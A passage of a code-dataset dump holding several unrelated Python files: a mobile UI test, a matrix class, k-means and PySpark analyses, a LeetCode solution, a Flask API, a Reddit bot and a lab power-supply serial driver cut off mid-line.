locate_by_anchor(init_element(self.calendar_anchor), 2, 'l1').get_text()\n            function1 = '设置营销折扣,吸引买家下单'  # 促销打折话术\n            function2 = '优化标题,增加宝贝曝光率'  # 标题优化话术\n            function3 = '多买多减优惠,提高客单价'  # 满减优惠话术\n            function4 = '投放活动海报,增强活动气氛'  # 促销海报话术\n            function5 = '添加活动水印,提示宝贝点击率'  # 促销水印话术\n            element_click(self.calendar_anchor)\n            self.check_QN_auth()\n            self.check_AYitem_auth()\n            if my_function == function1:\n                try:\n                    poco(name=' 创建活动 ').wait_for_appearance(5)\n                    self.turn_back()\n                    return True\n                except PocoTargetTimeout:\n                    self.turn_back()\n                    return False\n            elif my_function == function2:\n                try:\n                    poco(text='上次优化时间:').wait_for_appearance(5)\n                    self.turn_back()\n                    return True\n                except PocoTargetTimeout:\n                    self.turn_back()\n                    return False\n            elif my_function == function3:\n                try:\n                    poco(name=' 创建活动 ').wait_for_appearance(5)\n                    self.turn_back()\n                    return True\n                except PocoTargetTimeout:\n                    self.turn_back()\n                    return False\n            elif my_function == function4:\n                try:\n                    poco(text='促销海报').wait_for_appearance(5)\n                    self.turn_back()\n                    return True\n                except PocoTargetTimeout:\n                    self.turn_back()\n                    return False\n            elif my_function == function5:\n                try:\n                    sleep(2)\n                    poco(textMatches='.*水印').wait_for_appearance(5)\n                    self.turn_back()\n                    return True\n                except PocoTargetTimeout:\n                    self.turn_back()\n                    return False\n\n\nif __name__ == '__main__':\n    x = ItemList()\n\n    ","repo_name":"18901728477/ui_test_project-master","sub_path":"mobile/mitem_ui_test/mitem_ui_test/pages/item_list_page.py","file_name":"item_list_page.py","file_ext":"py","file_size_in_byte":13223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"2249018719","text":"# Matrix.\n\n\n# Write a class that can represent any 4x4 real matrix.\n# Include two functions to calculate the sum and dot product of two matrices.\n# Next, write a program that imports this library module and use it to perform calculations.\n# You CAN'T use numpy.\n# Examples:\n#\n# matrix_1 = Matrix(4.,5.,6.,7.)\n# matrix_2 = Matrix(2.,2.,2.,1.)\n#\n# matrix_3 = matrix_2 @ matrix_1\n# matrix_4 = matrix_2 + matrix_1\n# matrix_4 = 6 + matrix_1\n# matrix_4 = matrix_1 + 6\n#\n# expand your solution to include other operations like\n# - subtraction\n# - inversion\n# - string representation\n#\n# Try to expand your implementation as best as you can.\n# Think of as many features as you can, and try implementing them.\n# Make intelligent use of pythons syntactic sugar (overloading, iterators, generators, etc)\n# Most of all: CREATE GOOD, RELIABLE, READABLE CODE.\n# The goal of this task is for you to SHOW YOUR BEST python programming skills.\n# Impress everyone with your skills, show off with your code.\n#\n# Your program must be runnable with command \"python task.py\".\n# Show some usecases of your library in the code (print some things)\n# Delete these comments before commit!\n#\n# Good luck.\nimport logging\n\n\nclass NonMatchingMatrixSizes(Exception):\n\n    def __init__(self, matrix1Size, matrix2Size):\n        self.matrix1Size = matrix1Size\n        self.matrix2Size = matrix2Size\n        self.message = \"Matrix of size {}x{} and Matrix of size {}x{} do not match\".format(\n            self.matrix1Size, self.matrix1Size, self.matrix2Size, self.matrix2Size)\n        super(NonMatchingMatrixSizes, self).__init__(self.message)\n\n\nclass SquareMatrix:\n\n    def __init__(self, data=\"Empty\", size=2):\n        if data != \"Empty\":\n            self.size = len(data)\n        else:\n            self.size = size\n\n        self.Matrix = self._createEmptyMatrixOfSize(self.size)\n        if data != \"Empty\":\n            for i in range(self.size):\n                for j in range(self.size):\n                    
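# copy each caller-supplied element into the zero-initialized grid\n                    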
self.Matrix[i][j] = data[i][j]\n\n def transpone(self):\n logging.info(\"Ongoing Operation: Matrix transposition\")\n transpositionProduct = SquareMatrix(data=\"Empty\", size=self.size)\n for i in range(self.size):\n for j in range(self.size):\n transpositionProduct.Matrix[i][j] = self.Matrix[j][i]\n return transpositionProduct\n\n def __str__(self, loggingValue=\"\"):\n loggingValue = \"Displaying Matrix of size {}x{}:\\n\".format(\n self.size, self.size)\n loggingValue += self._getMatrixValues()\n return loggingValue\n\n def __repr__(self):\n return self._getMatrixValues()\n\n def __add__(self, secondMatrix):\n secondOperand = self._validateMatricesSizes(self, secondMatrix)\n additionProdut = SquareMatrix(data=\"Empty\", size=self.size)\n\n if secondOperand[\"type\"] == \"int\":\n additionProdut = self._calculateWithOperand(\n self, '+', secondMatrix, additionProdut)\n elif secondOperand[\"type\"] == \"matrix\":\n additionProdut = self._calculateMatrices(\n self, '+', secondMatrix, additionProdut)\n return additionProdut\n\n def __radd__(self, secondOperand: int):\n additionProdut = SquareMatrix(data=\"Empty\", size=self.size)\n additionProdut = self._calculateWithOperand(\n self, '+', secondOperand, additionProdut)\n return additionProdut\n\n def __sub__(self, secondMatrix):\n secondOperand = self._validateMatricesSizes(self, secondMatrix)\n subtractionProduct = SquareMatrix(data=\"Empty\", size=self.size)\n\n if secondOperand[\"type\"] == \"int\":\n subtractionProduct = self._calculateWithOperand(\n self, '-', secondMatrix, subtractionProduct)\n elif secondOperand[\"type\"] == \"matrix\":\n subtractionProduct = self._calculateMatrices(\n self, '-', secondMatrix, subtractionProduct)\n return subtractionProduct\n\n def __rsub__(self, secondOperand: int):\n subtractionProduct = SquareMatrix(data=\"Empty\", size=self.size)\n subtractionProduct = self._calculateWithOperand(\n self, \"-\", secondOperand, subtractionProduct)\n return subtractionProduct\n\n def __mul__(self, secondMatrix):\n secondOperand = self._validateMatricesSizes(self, secondMatrix)\n multiplicationProduct = SquareMatrix(data=\"Empty\", size=self.size)\n\n if secondOperand[\"type\"] == \"int\":\n multiplicationProduct = self._calculateWithOperand(\n self, '*', secondMatrix, multiplicationProduct)\n elif secondOperand[\"type\"] == \"matrix\":\n multiplicationProduct = self._calculateMatrices(\n self, '*', secondMatrix, multiplicationProduct)\n return multiplicationProduct\n\n def __rmul__(self, secondOperand: int):\n multiplicationProduct = SquareMatrix(data=\"Empty\", size=self.size)\n multiplicationProduct = self._calculateWithOperand(\n self, \"*\", secondOperand, multiplicationProduct)\n return multiplicationProduct\n\n def __truediv__(self, secondMatrix):\n secondOperand = self._validateMatricesSizes(self, secondMatrix)\n multiplicationProduct = SquareMatrix(data=\"Empty\", size=self.size)\n\n if secondOperand[\"type\"] == \"int\":\n multiplicationProduct = self._calculateWithOperand(\n self, '/', secondMatrix, multiplicationProduct)\n elif secondOperand[\"type\"] == \"matrix\":\n multiplicationProduct = self._calculateMatrices(\n self, '/', secondMatrix, multiplicationProduct)\n return multiplicationProduct\n\n def __rtruediv__(self, secondOperand: int):\n multiplicationProduct = SquareMatrix(data=\"Empty\", size=self.size)\n multiplicationProduct = self._calculateWithOperand(\n self, \"/\", secondOperand, multiplicationProduct)\n return multiplicationProduct\n\n def __matmul__(self, secondMatrix):\n 
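# classic O(n^3) triple loop: result[i][j] accumulates the dot product of row i of self with column j of the operand\n        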
logging.info(\"Ongoing Operation: Matrix @ Matrix multiplication\")\n secondOperand = self._validateMatricesSizes(self, secondMatrix)\n multiplicationProduct = SquareMatrix(data=\"Empty\", size=self.size)\n if secondOperand[\"type\"] == \"int\":\n multiplicationProduct = self._calculateWithOperand(\n self, '*', secondMatrix, multiplicationProduct)\n if secondOperand[\"type\"] == \"matrix\":\n for i in range(len(self.Matrix)):\n for j in range(len(secondMatrix.Matrix[0])):\n for k in range(len(secondMatrix.Matrix)):\n multiplicationProduct.Matrix[i][j] += self.Matrix[i][k] * \\\n secondMatrix.Matrix[k][j]\n return multiplicationProduct\n\n def _calculateWithOperand(self, firstOperand, operator, secondOperand, result):\n logging.info(\"Ongoing Operation: Matrix {} {}\".format(\n operator, secondOperand))\n for i in range(firstOperand.size):\n for j in range(firstOperand.size):\n result.Matrix[i][j] = eval(\n \"firstOperand.Matrix[i][j]\" + operator + \"secondOperand\")\n return result\n\n def _calculateMatrices(self, firstOperand, operator, secondOperand, result):\n logging.info(\n \"calculating Matrices, operation operator: {}\".format(operator))\n for i in range(firstOperand.size):\n for j in range(firstOperand.size):\n result.Matrix[i][j] = eval(\n \"firstOperand.Matrix[i][j]\" + operator + \"secondOperand.Matrix[i][j]\")\n return result\n\n def _createEmptyMatrixOfSize(self, size):\n return [[0 for i in range(size)] for j in range(size)]\n\n def _getMatrixValues(self):\n loggingValue = \"\"\n for i in range(self.size):\n for j in range(self.size):\n loggingValue += \"{} \".format(self.Matrix[i][j])\n loggingValue += \"\\n\"\n return loggingValue\n\n def _validateMatricesSizes(self, matrix1, matrix2):\n if isinstance(matrix2, int):\n operandType = {}\n operandType[\"type\"] = \"int\"\n return operandType\n if matrix1.size != matrix2.size:\n raise NonMatchingMatrixSizes(matrix1.size, matrix2.size)\n operandType = {}\n operandType[\"type\"] = \"matrix\"\n return operandType\n\n\nif __name__ == \"__main__\":\n\n # Displaying info logs for better comprehension of the example operations presented below\n logging.basicConfig(level=logging.DEBUG)\n\n logging.info(\"creating the first 2x2 matrix\")\n filledMatrix_2x2 = SquareMatrix([[1, 2],\n [3, 4]])\n print(filledMatrix_2x2)\n\n logging.info(\"creating the second 2x2 matrix\")\n secondFilledMatrix_2x2 = SquareMatrix([[4, 3],\n [2, 1]])\n print(secondFilledMatrix_2x2)\n\n matrixAddition = filledMatrix_2x2 + secondFilledMatrix_2x2\n print(matrixAddition)\n\n matrixsubtraction = filledMatrix_2x2 - secondFilledMatrix_2x2\n print(matrixsubtraction)\n\n matrixNumAddition = 2 + filledMatrix_2x2\n print(matrixNumAddition)\n\n matrixNumSubtraction = 2 - filledMatrix_2x2\n print(matrixNumSubtraction)\n\n matrixNumMultiplication = 2 * filledMatrix_2x2\n print(matrixNumMultiplication)\n\n matrixNumDivision = 2 / filledMatrix_2x2\n print(matrixNumDivision)\n\n matrixMultiplication = filledMatrix_2x2 @ secondFilledMatrix_2x2\n print(matrixMultiplication)\n\n logging.info(\"creating a 3x3 matrix for transposition purposes\")\n filledMatrix_3x3 = SquareMatrix([[1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]])\n print(filledMatrix_3x3)\n\n matrixTranspone = filledMatrix_3x3.transpone()\n print(matrixTranspone)\n\n logging.info(\"creating a 4x4 EMPTY matrix\")\n emptyMatrix_4x4 = SquareMatrix(data=\"Empty\", size=4)\n 
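# with data=\"Empty\", the constructor yields an all-zeros matrix of the requested size\n    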
print(emptyMatrix_4x4)\n","repo_name":"pite2020win/fri-11-20-task3-michalloska","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":9946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"35454914147","text":"from __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.contrib.factorization import KMeans\nimport pickle\nimport matplotlib.pyplot as plt\n\n# Remove use of GPU\n# import os\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"\"\n\n# import SoNYC data:\nsonyc_length = 128\nclass_length = 1\nprint(\"** Loading SoNYC datasets **\")\nnegative_xy = pickle.load(open(\"../data/negative_xy.pickle\", \"rb\"))\npositive_xy = pickle.load(open(\"../data/positive_xy.pickle\", \"rb\"))\n\n# Choose the data source\nx_pool_file = \"../data/X_pool.pickle\" # 1000 * 128\n# x_pool_file = \"../data/X_pool_10000_new.pickle\" # 10000 * 132\n# x_pool_file = \"../data/X_pool_100000_new.pickle\"\n# x_pool_file = \"../data/X_pool_100000_random.pickle\"\nX_pool = pickle.load(open(x_pool_file, \"rb\"))\n\n# Modify the SoNYC data (a little bit) just for this model:\nX_pool = X_pool[:,:sonyc_length] # number_of_unlabeled * 128\nlabeled_data = np.vstack((positive_xy, negative_xy)) # 600 * 129\nlabels = labeled_data[:, sonyc_length] # 600 * 1\nMat_Label = np.split(labeled_data, [sonyc_length], axis=1)[0] # 600 * 128\n\nfull_data_x = np.vstack((Mat_Label, X_pool))\n\n# Parameters\nkmean_iterations = 200 # Total steps to train\nk = 2 # The number of clusters\nnum_classes = 2 # good or bad audio\nnum_features = 128 # Length of each audio embedding = 128\n\nX = tf.placeholder(tf.float32, shape=[None, num_features])\n\nkmeans = KMeans(inputs=X,\n num_clusters=k,\n distance_metric='cosine',\n use_mini_batch=True)\n\n# use tensorflow 1.7\n(all_scores, cluster_idx, scores, cluster_centers_initialized, init_op, train_op) = kmeans.training_graph()\n\ncluster_idx = cluster_idx[0]\navg_distance = tf.reduce_mean(scores)\n\ninit_vars = tf.global_variables_initializer()\n\nsess = tf.Session()\n\nsess.run(init_vars, feed_dict={X: full_data_x})\nsess.run(init_op, feed_dict={X: full_data_x})\n\nerror_rates = []\ndisplay_steps = 10\nfor i in range(1, kmean_iterations + 1):\n _, d, idx = sess.run([train_op, avg_distance, cluster_idx], feed_dict={X: full_data_x})\n\n part1 = idx[0:300]\n part2 = idx[301:600]\n sumPart1 = np.sum(part1)\n sumPart2 = np.sum(part2)\n # Label the cluster\n if sumPart1 >= sumPart2: # as it is\n correct_part1 = sumPart1\n correct_part2 = 300-sumPart2\n else: # reverse\n correct_part1 = 300-sumPart1\n correct_part2 = sumPart2\n\n # Calculate error rate:\n error_rate = 1 - (correct_part1 + correct_part2)/600\n error_rates.append(error_rate)\n\n if i % display_steps == 0 or i == 1:\n print(\"Step %i, Avg Distance: %f\" % (i, d))\n print('Error rate: %f' % error_rate)\n\n# Plot error rate\nplt.plot(error_rates)\nplt.xlabel(\"Iteration\")\nplt.ylabel(\"Error Rate\")\nplt.title(\"Error Rate in K-Means Iterations. 
\\nUnlabeled File:\"+x_pool_file)\nplt.axis([-10, kmean_iterations+10, 0, 1])\nplt.show()\n\n","repo_name":"wangyu/sonyc_distortion_classification","sub_path":"models/kmean.py","file_name":"kmean.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"}
+{"seq_id":"10886326353","text":"from pyspark import SparkContext\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql import SQLContext\r\n\r\nspark = (SparkSession \\\r\n    .builder \\\r\n    .appName('Project_name') \\\r\n    .config('spark.executor.memory', '20G') \\\r\n    .config('spark.driver.memory', '20G') \\\r\n    .config('spark.driver.maxResultSize', '10G') \\\r\n    .config('spark.sql.shuffle.partitions',300) \\\r\n    .config('spark.worker.cleanup.enabled', 'True') \\\r\n    .config('spark.local.dir','/tmp/spark-temp') \\\r\n    .getOrCreate())\r\n\r\n# sc= SparkContext(appName=\"si618_hw6_output_1_shiyuguo\")\r\nsc = spark.sparkContext\r\nsqlContext = SQLContext(sc)\r\ngdp_df=sqlContext.read.csv(\"hdfs://cavium-thunderx/user/shiyuguo/Project1/gdp_d.csv\",header=True)\r\nmortality_df=sqlContext.read.csv(\"hdfs://cavium-thunderx/user/shiyuguo/Project1/mortality_d.csv\",header=True)\r\ncontinent_df=sqlContext.read.csv(\"hdfs://cavium-thunderx/user/shiyuguo/Project1/countryContinent.csv\",header=True)\r\n\r\ngdp_df.printSchema()\r\nmortality_df.printSchema()\r\ncontinent_df.printSchema()\r\n\r\n### Reshape data from wide to long\r\ncols1=gdp_df.columns[4:]\r\ngdp_df.withColumnRenamed(\"Country Name\",\"Country_name\") \\\r\n    .withColumnRenamed(\"Country Code\",\"Country_code\") \\\r\n    .selectExpr('Country_name','Country_code',\"stack({0},{1}) as (`Year`,`GDP_percapita`)\".format(len(cols1), ','.join((\"'{}', `{}`\".format(i, i) for i in cols1)))) \\\r\n    .registerTempTable('gdp')\r\n\r\ncols2=mortality_df.columns[4:]\r\nmortality_df.withColumnRenamed(\"Country Code\",\"Country_code\") \\\r\n    .withColumnRenamed(\"Country Name\",\"Country_name\") \\\r\n    .selectExpr('Country_name','Country_code',\"stack({0},{1}) as (`Year`,`Mortality_rate`)\".format(len(cols2), ','.join((\"'{}', `{}`\".format(i, i) for i in cols2)))) \\\r\n    .registerTempTable('mortality')\r\n    \r\ncontinent_df.registerTempTable('continent')\r\n\r\n### Join 3 datasets\r\nmerge1 = sqlContext.sql('SELECT g.Country_name, g.Country_code, CAST(g.Year as double), CAST(g.GDP_percapita as double), CAST(m.Mortality_rate as double) \\\r\n    FROM gdp g FULL OUTER JOIN mortality m ON (g.Country_name=m.Country_name AND g.Year=m.Year) \\\r\n    WHERE g.Year !=2020 \\\r\n    ORDER BY g.Country_name,g.Year ASC').registerTempTable('Merge1')\r\n\r\nmerge2= sqlContext.sql('SELECT m.Country_name, c.continent, c.sub_region,m.Year,m.GDP_percapita as GDP_percapita,(m.Mortality_rate/1000)*100 as Mortalityrate \\\r\n    FROM Merge1 m JOIN continent c ON (m.Country_code=c.code_3 AND m.Country_name=c.country) \\\r\n    WHERE m.Year !=2020 \\\r\n    ORDER BY m.Country_name,m.Year ASC')\r\nmerg2rdd= merge2.rdd.map(lambda i: ','.join(str(j) for j in i)).saveAsTextFile('project1_final_merge')\r\nmerge2.registerTempTable('Merge2')\r\n\r\n###Q1: World and Continent Human progress trends\r\nworld_ratio= sqlContext.sql('SELECT Year, round(avg(Mortalityrate),2),round(avg(GDP_percapita),2) \\\r\n    FROM Merge2 WHERE Year <=2015 GROUP BY Year ORDER BY Year ASC')\r\n\r\nworld_ratiordd= world_ratio.rdd.map(lambda i: ','.join(str(j) for j in i)).saveAsTextFile('project1_world_ratio')\r\n\r\n\r\ncontinent_ratio = sqlContext.sql('SELECT continent,Year, round(avg(Mortalityrate),2),round(avg(GDP_percapita),2) \\\r\n    FROM Merge2 WHERE 
Year<=2015 GROUP BY continent,Year ORDER BY continent,Year ASC') \r\n\r\ncontinent_ratiordd= continent_ratio.rdd.map(lambda i: ','.join(str(j) for j in i)).saveAsTextFile('project1_continent_ratio')\r\n\r\n### Q2: The performance of countries by regions before and after 2015\r\ndifference = sqlContext.sql('SELECT b.Country_name,b.continent,b.sub_region,b.Year,b.Mortalityrate-a.Mortalityrate AS Mortality_diff, ((b.GDP_percapita-a.GDP_percapita)/a.GDP_percapita)*100 AS GDPPer_diff \\\r\n FROM Merge2 a JOIN Merge2 b on b.Country_name=a.Country_name AND (b.Year-1)=a.Year \\\r\n ORDER BY b.Country_name,b.Year ASC')\r\ndifferencerdd= difference.rdd.map(lambda i: ','.join(str(j) for j in i)).saveAsTextFile('project1_merge_diff')\r\n\r\ndifference.registerTempTable('Diff') \r\npre_subregion_ratio= sqlContext.sql('SELECT continent, sub_region,round(avg(Mortality_diff/GDPPer_diff),4) AS pre_ratio \\\r\n FROM Diff WHERE Year <= 2015 \\\r\n GROUP BY continent,sub_region ORDER BY continent,sub_region DESC').registerTempTable('pre_subregion')\r\n\r\npost_subregion_ratio=sqlContext.sql('SELECT continent, sub_region,round(avg(Mortality_diff/GDPPer_diff),4) AS post_ratio \\\r\n FROM Diff WHERE Year > 2015 \\\r\n GROUP BY continent,sub_region ORDER BY continent,sub_region DESC').registerTempTable('post_subregion')\r\n\r\nsubregion_ratio = sqlContext.sql('SELECT b.continent,b.sub_region,a.pre_ratio, b.post_ratio,ROUND(b.post_ratio-a.pre_ratio,4) AS ratio_compare \\\r\n FROM post_subregion b JOIN pre_subregion a ON b.continent=a.continent AND b.sub_region=a.sub_region \\\r\n ORDER BY continent,ratio_compare DESC')\r\n\r\nsubregion_ratiordd= subregion_ratio.rdd.map(lambda i: ','.join(str(j) for j in i)).saveAsTextFile('project1_subregion_ratio')\r\n# subregion_ratio.write.format('csv').option('delimiter',',').option('header','true').save('project1_subregion_ratio')\r\n\r\n#### 3. 
top 20 well-performing countries pre-2015 and post-2015\r\npre_country_ratio= sqlContext.sql('SELECT Country_name,continent,round(avg(Mortality_diff/GDPPer_diff),3) AS pre_ratio \\\r\n    FROM Diff WHERE Year <= 2015 \\\r\n    GROUP BY Country_name,continent ORDER BY pre_ratio DESC').registerTempTable('pre_country')\r\n\r\npost_country_ratio= sqlContext.sql('SELECT Country_name, continent, round(avg(Mortality_diff/GDPPer_diff),3) AS post_ratio \\\r\n    FROM Diff WHERE Year > 2015 \\\r\n    GROUP BY Country_name,continent ORDER BY post_ratio DESC').registerTempTable('post_country')\r\n\r\npre_rank= sqlContext.sql('SELECT * FROM pre_country LIMIT 20').show()\r\n\r\npost_rank= sqlContext.sql('SELECT * FROM post_country LIMIT 20').show()\r\n\r\ncompare_rank= sqlContext.sql('SELECT b.Country_name,b.continent, ROUND(b.post_ratio-a.pre_ratio,3) AS ratio_compare \\\r\n    FROM post_country b JOIN pre_country a ON b.Country_name=a.Country_name\\\r\n    ORDER BY ratio_compare DESC LIMIT 20') .show()\r\n\r\n","repo_name":"guosy530/Data-Gathering-Processing","sub_path":"Project_code.py","file_name":"Project_code.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"37957534123","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution(object):\n    def convertBST(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: TreeNode\n        \"\"\"\n        if root is None:\n            return root\n        queue = [root]\n        total = 0\n        while len(queue) > 0:\n            node = queue.pop()\n            total += node.val\n            if node.left is not None:\n                queue.append(node.left)\n            if node.right is not None:\n                queue.append(node.right)\n        \n        temp = 0\n        pre_order(root, total, temp)\n        return root\n    \ndef pre_order(root, total, temp):\n    if root is None:\n        return temp\n    \n    if root.left is not None:\n        temp = pre_order(root.left, total, temp)\n    \n    older = root.val\n    root.val = total - temp\n    temp += older\n    \n    if root.right is not None:\n        temp = pre_order(root.right, total, temp)\n    return temp\n    \n    \n    \n    \n    \n    \n","repo_name":"ruizhang84/LeetCode-OJ","sub_path":"convertBST.py","file_name":"convertBST.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"35812049265","text":"import sqlite3\nfrom flask_restful import Resource, reqparse\n\nclass Platform(Resource):\n    # request parser (restored): post() and put() below read these fields\n    # via Platform.parser.parse_args()\n    parser = reqparse.RequestParser()\n    parser.add_argument('name', type=str)\n    parser.add_argument('price_first_released', type=float)\n    parser.add_argument('release_date', type=str)\n\n    def get(self, name):\n        game = self.find_by_name(name)\n        if game:\n            return game\n        return {\"message\": \"Platform not found\"}\n\n    @classmethod\n    def find_by_name(cls, name):\n        conn = sqlite3.connect('games.db')\n        cursor = conn.cursor()\n        query = \"SELECT * FROM platforms WHERE name=?\"\n        result = cursor.execute(query, (name,))\n        row = result.fetchone()\n        conn.close()\n        if row:\n            return {\"game\": {\"name\": row[0], \"price_first_released\": row[1], \"release_date\": row[2]}}\n\n    @classmethod\n    def find_by_id(cls, id):\n        conn = sqlite3.connect('games.db')\n        cursor = conn.cursor()\n        query = \"SELECT * FROM platforms WHERE id=?\"\n        result = cursor.execute(query, (id,))\n        row = result.fetchone()\n        conn.close()\n        if row:\n            return {\"game\": {\"name\": row[0], \"price_first_released\": row[1], \"release_date\": row[2]}}\n\n    @classmethod\n    def insert(cls, platform):\n        conn = sqlite3.connect('games.db')\n        cursor = conn.cursor()\n        query = \"INSERT INTO platforms (name, price_first_released, release_date) VALUES (?,?,?)\"\n        
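# explicit column list keeps the insert valid even if the table also has an id column\n        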
cursor.execute(query, (platform['name'], platform['price_first_released'], platform['release_date']))\n        conn.commit()\n        conn.close()\n\n    @classmethod\n    def update(cls, platform):\n        conn = sqlite3.connect('games.db')\n        cursor = conn.cursor()\n        query = \"UPDATE platforms SET name=?, price_first_released=?, release_date=? WHERE name=?\"\n        cursor.execute(query, (platform['name'], platform['price_first_released'], platform['release_date'], platform['name']))\n        conn.commit()\n        conn.close()\n\n    def post(self, name):\n        data = Platform.parser.parse_args()\n        platform = {\"name\": name, \"price_first_released\": data[\"price_first_released\"], \"release_date\": data[\"release_date\"]}\n        try:\n            self.insert(platform)\n        except:\n            return {\"message\": \"An error occurred inserting the platform.\"}, 500\n        return platform, 201\n\n    def delete(self, id):\n        conn = sqlite3.connect('games.db')\n        cursor = conn.cursor()\n        query = \"DELETE FROM platforms WHERE id=?\"\n        cursor.execute(query, (id,))\n        conn.commit()\n        conn.close()\n        return {\"message\": \"Platform deleted\"}\n\n    def put(self, id):\n        data = Platform.parser.parse_args()\n        platform = self.find_by_id(id)\n        updated_platform = {\"name\": data['name'], \"price_first_released\": data[\"price_first_released\"], \"release_date\": data[\"release_date\"]}\n        if platform is None:\n            try:\n                self.insert(updated_platform)\n            except:\n                return {\"message\": \"An error occurred inserting the Platform.\"}\n        else:\n            try:\n                self.update(updated_platform)\n            except:\n                return {\"message\": \"An error occurred inserting the platform.\"}\n        return updated_platform\n\n\nclass PlatformList(Resource):\n    def get(self):\n        conn = sqlite3.connect('games.db')\n        cursor = conn.cursor()\n        query = \"SELECT * FROM platforms\"\n        result = cursor.execute(query)\n        platforms = []\n        for row in result:\n            platforms.append({\"name\": row[0], \"price_first_released\": row[1], \"release_date\": row[2]})\n        conn.close()\n        return {\"platforms\": platforms}\n","repo_name":"stradtkt/game_api","sub_path":"platform.py","file_name":"platform.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"5502622221","text":"# https://github.com/jorgegonzalez/beginner-projects#watch-for-new-til-facts\n# Finished at 27 Apr 2020\nimport praw, re, time\nfrom praw import exceptions\n\nreddit = praw.Reddit(client_id = 'xxx',\n                     client_secret = 'xxx',\n                     user_agent = 'xxx',\n                     username = 'xxx',\n                     password = 'xxx')\nsubreddit = reddit.subreddit('todayilearned')\n\n\ndef structure_change(str):\n    pattern_front = r'TIL[\\s|\\:]*(that\\s|\\-\\s)*'\n    pattern_end = r'(\\.\"|\\.)$'\n    if re.match(pattern_front, str):\n        new_str = re.sub(pattern_front, '', str, 1)\n        new_str = new_str[0].upper() + new_str[1:]\n        if re.search(pattern_end, new_str):\n            pass\n        elif new_str[-1] == ' ':\n            new_str = new_str[:-1] + '.'\n        else:\n            new_str = new_str + '.'\n        return new_str\n    else:\n        return str\n\nold_fact = ''\nnew_fact = ''\nnew_fact_link = ''\n\nwhile True:\n    for submission in subreddit.new(limit=1):\n        new_fact = submission.title\n        new_fact = structure_change(new_fact)\n        new_fact_link = submission.url\n        if new_fact != old_fact:\n            with open('til_facts.txt', 'a') as f:\n                f.write('\\n')\n                f.write(new_fact + '\\n')\n                f.write(f'Link >>> {new_fact_link}\\n')\n            old_fact = new_fact\n            print(new_fact)\n            print(f'Link >>> {new_fact_link}')\n            print()\n\n    
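# throttle polling so the bot stays well under Reddit's API rate limits\n    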
time.sleep(30)","repo_name":"proxima-k/beginner-python-projects","sub_path":"35_TILFacts.py","file_name":"35_TILFacts.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"17130663704","text":"import sys\r\nimport serial\r\nimport serial.tools.list_ports\r\nimport time\r\n\r\nclass CPX400DP:\r\n\t\r\n\tserialName=None\r\n\tserialPort=None\r\n\tverbose=False\r\n\tdef __init__(self):\r\n\t\tpass\r\n\t\t\r\n\tdef autoDetection(self):\r\n\t\t# produce a list of all serial ports. The list contains a tuple with the port number, \r\n\t\t# description and hardware address\r\n\t\tports = list(serial.tools.list_ports.comports())\t\t\r\n\t\tprint(\"Detection des appareils\")\r\n\t\tfor port_no, description, address in ports:\r\n\t\t\tprint(description)\r\n\t\t\tif 'CPX400' in description:\r\n\t\t\t\treturn port_no\r\n\t\tprint(\"Aucun appareil détecté\")\r\n\t\treturn None\r\n\t\t\r\n\tdef connection(self, name=None, retry=True, timeout=3):\r\n\t\tcpt=0\r\n\t\toutput=False\r\n\t\twhile output==False:\r\n\t\t\tcpt+=1\r\n\t\t\tif self.verbose: \r\n\t\t\t\tprint(str(cpt))\r\n\t\t\tif name==None:\r\n\t\t\t\tif self.serialName==None:\r\n\t\t\t\t\tself.serialName=self.autoDetection()\r\n\t\t\t\t\t#print(\"Appareil non connecté\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tname=self.serialName\r\n\t\t\t\t\tif self.verbose: \r\n\t\t\t\t\t\tprint(\"Appareil \"+name+\" présent\")\r\n\t\t\tif self.serialName!=None:\r\n\t\t\t\ttry:\r\n\t\t\t\t\t# open serial port\r\n\t\t\t\t\tself.serialPort = serial.Serial(name,115200)\r\n\t\t\t\t\tif self.serialPort.name!=None:\r\n\t\t\t\t\t\toutput=True\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint(self.serialName+\" occupée\")\r\n\t\t\t\t\toutput=False\r\n\t\t\tif output==False:\r\n\t\t\t\ttime.sleep(timeout)\r\n\t\tif self.verbose and output: \r\n\t\t\tif self.serialPort.name!=None:\r\n\t\t\t\tprint(\"Connecté à \"+self.serialPort.name)\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Erreur de connection\")\r\n\t\treturn output\r\n\t\r\n\tdef disconnection(self):\r\n\t\tself.serialPort.close()\r\n\t\r\n\tdef setVoltage(self, v, channel=1):\r\n\t\tcmd='V'+str(channel)+' '+str(v)+'\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\t\r\n\tdef getVoltage(self):\r\n\t\treturn 0.0\r\n\t\r\n\tdef setCurrent(self, i, channel=1):\r\n\t\tcmd='I'+str(channel)+' '+str(v)+'\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\t\r\n\tdef getCurrent(self, channel=1):\r\n\t\tcmd='I'+str(channel)+'O?\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\tanswer=self.serialPort.readline()\r\n\t\treturn float(answer[:-3])\r\n\t\r\n\tdef 